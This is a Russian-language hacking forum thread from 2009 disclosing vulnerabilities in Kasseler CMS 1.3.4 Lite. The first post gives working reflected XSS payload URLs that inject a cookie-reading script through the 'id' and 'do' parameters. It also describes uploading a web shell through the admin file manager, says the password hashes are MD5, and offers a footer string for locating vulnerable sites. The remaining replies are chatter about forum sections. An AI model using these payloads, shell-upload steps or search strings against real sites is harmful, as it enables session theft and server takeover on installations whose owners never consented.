Немного XSS в Kasseler CMS 1.3.4 Lite

Discussion in 'Веб-уязвимости' started by Kraneg, 27 Jan 2009.

  1. Kraneg

    Kraneg Elder - Старейшина

    Joined:
    30 Aug 2008
    Messages:
    107
    Likes Received:
    97
    Reputations:
    21
    Kasseler CMS 1.3.4 Lite возможно и ранние версии
    http://www.kasseler-cms.net/


    Пасивные XSS:

    1.http://*****.ru/index.php?module=News&do=View&id=<script>alert(document.cookie)</script>
    или
    2.http://*****.ru/index.php?module=News&do=<script>alert(document.cookie)</script>&id=1

    Вообще вместо этих ссылок можно использовать любую... Уязвимые параметры ID и DO именно в них и прокатывает пасивка

    hash - md5

    Заливка шела:
    Переходим в админку -> Файловый менеджер -> Выбираем нужный нам каталог -> и внизу можно залить файлы в него

    Как искать:
    by Kasseler CMS. All rights reserved.

    Если что то не так прошу меня поправить... =) Все таки первое что нашел сам =)
     
    2 people like this.
  2. Kraneg

    Kraneg Elder - Старейшина

    Joined:
    30 Aug 2008
    Messages:
    107
    Likes Received:
    97
    Reputations:
    21
    Qam Да??? =)) А такая есть? =)
    Все увидел энциклопедию... =) надо было туда закинуть... Сори за невнимательность =)
     
    #2 Kraneg, 27 Jan 2009
    Last edited: 27 Jan 2009
  3. Qam

    Qam New Member

    Joined:
    16 Jan 2009
    Messages:
    30
    Likes Received:
    3
    Reputations:
    0
    Есть про пасивные хсс зато!
     
  4. Kraneg

    Kraneg Elder - Старейшина

    Joined:
    30 Aug 2008
    Messages:
    107
    Likes Received:
    97
    Reputations:
    21
    Qam хм не вижу... =) вобщем спор не имеет смысла так как тема уже создана и удалить я не могу... =) впрочем в седующий раз напишу в энциклопедию
     
    #4 Kraneg, 27 Jan 2009
    Last edited: 27 Jan 2009
  5. Qam

    Qam New Member

    Joined:
    16 Jan 2009
    Messages:
    30
    Likes Received:
    3
    Reputations:
    0
    прошу прощение Kraneg,видал тему про активные хсс и привидилось что и про пасивные есть!Вообщем извеняй дружище!Молодец побольше таких бы...